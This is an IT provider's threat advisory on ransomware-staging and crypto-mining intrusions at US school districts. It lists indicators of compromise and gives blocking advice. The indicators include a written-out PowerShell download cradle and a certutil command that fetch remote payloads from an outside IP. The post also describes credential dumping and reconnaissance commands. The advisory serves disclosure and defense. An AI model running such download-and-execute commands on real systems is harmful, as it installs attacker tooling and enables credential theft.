US School District Exploitation Attempts

by | May 2, 2022 | News, Technology

There is recent increased activity targeting school districts across the United States that appear to be staging for ransomware and numerous crypto-mining campaigns targeting critical remote and authentication servers for students.


Related Indicators of Compromise

powershell iex(New-Object Net.WebClient).DownloadString(‘hxxp://185.101.107[.]92/lol.ps1’)
“certutil.exe -urlcache -split -f hxxp:///checkit2.exe c:/windows/temp/checkit2.exe”


Summary of Exploitation Attempts

Detections have shown traffic to 185.101.107[.]92, an IP geolocated in Bucharest, Romania, which is flagged as malicious by 16 vendors on VirusTotal and is reported to be associated with crypto mining activity as per AbuseIPDB. Shodan also reports the IP belongs to an ubuntu machine with ports 21, 22, and 80 exposed, which suggests this is maybe a staging point for the threat actors to conceal their actual IP address.

Malicious Java processes spawning PowerShell and cmd prompts executing internal enumeration, privilege escalation, credential theft, and external downloads via PowerShell have been observed.

Starting with a common threat actor tactic known as a download cradle to download post-exploitation and exfiltration tools and loading them straight into memory (evading detection on disk), we are also seeing malicious usage of certutil.exe which is a legitimate Windows executable commonly used to display certification authority configuration information and retrieve certificates. However, it is used maliciously by these threat actors to remotely download a payload as opposed to a certificate.

In this case, an executable may be stored in the temp folder and could easily be overlooked without proper investigation. Detections for lsass dumping (credential theft) were also observed and are typically found when tools like mimikatz or procdump are executed. These tools can be abused to steal credentials for exfiltration and password cracking as well as an escalation of privilege, allowing the threat actor one step closer to domain admin and completing their actions on objectives.

In one school district case, discovery found: whoami, systeminfo, ipconfig, net user, net local admin, net group “domain computers”, and many more reconnaissance commands. In another case, multiple users and a service account with high privilege were identified as having connected to the associated malicious IP.



  • Use Geo-IP and block access to/from Romania if not needed in your environment
  • Create access lists to block
  • Review Internet traffic for any Indicators of Compromise
<a href="" target="_self">High Point Networks</a>

High Point Networks

High Point Networks is a leading provider of information technology solutions in both SMB and enterprise-level markets, servicing customers from coast to coast.

More Articles

Cybersecurity in Recent Headlines

Cybersecurity in Recent Headlines

High Point Networks takes security very seriously, and we want to help our customers lower risks in their environment. Even if the recent data breaches we see in the headlines this week did not directly impact you, it is an excellent reminder to make sure you are...

Cybersecurity Trends and Analysis

Cybersecurity Trends and Analysis

As a trusted IT Provider, High Point Networks must be aware of future cybersecurity trends to better serve, position, and protect our customers. The following are some cybersecurity trends that range from the boardroom to the cyber battlefield.   Business...

Tips for Making a Successful Closing Day

Tips for Making a Successful Closing Day

The Better Business Roundtable is a monthly live segment that features business experts from our community. These amazing leaders bring a wealth of experience in owning and running a business that they share with other companies in our area. Our CFO, Kelly...

We're Here to Help

Curious about our services? Need to chat with support?

Get In Touch

Channel Partner Inquiry

Contact Support

Let's Get Started

Prism Partner Contact